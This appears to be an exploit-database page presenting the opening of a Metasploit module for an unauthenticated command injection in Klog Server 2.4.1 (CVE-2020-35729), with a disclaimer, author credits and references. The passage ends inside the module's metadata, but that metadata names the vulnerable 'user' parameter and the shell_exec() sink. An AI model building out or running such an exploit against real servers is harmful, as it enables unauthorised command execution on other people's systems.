Klog server 2.4.1 unauthenticated command injection (metasploit) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-01-25 |
Type : webapps |
Platform : php
This exploit / vulnerability Klog server 2.4.1 unauthenticated command injection (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
"user" parameter is executed via shell_exec() function without input validation.
},
'License' => MSF_LICENSE,
'Author' =>
[ 'B3KC4T', # Vulnerability discovery
'Metin Yunus Kandemir', # Metasploit module
],
'References' =>
[
['CVE', '2020-35729'],
['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
],